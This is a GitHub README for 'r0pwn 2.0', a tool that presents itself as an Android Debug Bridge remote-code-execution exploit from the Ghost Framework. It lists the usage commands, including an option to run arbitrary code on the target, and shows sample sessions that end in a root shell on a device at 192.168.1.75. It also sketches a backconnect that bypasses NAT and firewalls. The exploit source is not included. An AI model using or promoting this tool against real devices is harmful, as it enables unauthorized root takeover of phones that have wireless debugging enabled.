r0pwn 2.0 (Ghost Framework)

hmm... r0pwn means robot pwn?

Android Debug Bridge RCE exploit.

Release

This is a repo of an exploit, but this exploit is a part of the Ghost Framework developed by @entynetproject.

Ghost Framework

Dependencies

android-platform-tools

Exploiting

python3 exploit.py <target>

NOTE: Target should have wireless debugging turned on

root@kali:~/r0pwn# python3 exploit.py 192.168.1.75

======================
r0pwn by Ivan Nikolsky
======================

Android Debug Bridge RCE exploit.

exploiting 192.168.1.75...
root@nevada:~# whoami
root
root@nevada:~#

Substitution

root@kali:~/r0pwn# python3 exploit.py <target> -s <code>

NOTE: Angry substitution will not work without SUID/root!

root@kali:~/r0pwn# python3 exploit.py 192.168.1.75 -s whoami

======================
r0pwn by Ivan Nikolsky
======================

Android Debug Bridge RCE exploit.

exploiting 192.168.1.75...
substituting whoami...
executing whoami...
root

Algorithm

                    backconnect (over ADB)
               +------------------------------+
               |                              |
attacker --- r0pwn --- NAT -+- Firewall -+- target
                            |            |
                            +------------+
                                bypass

Credits

Authors:

Ivan Nikolsky (@enty8080) - research and development.

Special Thanks:

PhoneSploit - thanks for inspiration.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

r0pwn 2.0 (Ghost Framework)

Table of contents

Release

Dependencies

Exploiting

Substitution

Algorithm

Credits

Files

README.md

Latest commit

History

README.md

File metadata and controls

r0pwn 2.0 (Ghost Framework)

Table of contents

Release

Dependencies

Exploiting

Substitution

Algorithm

Credits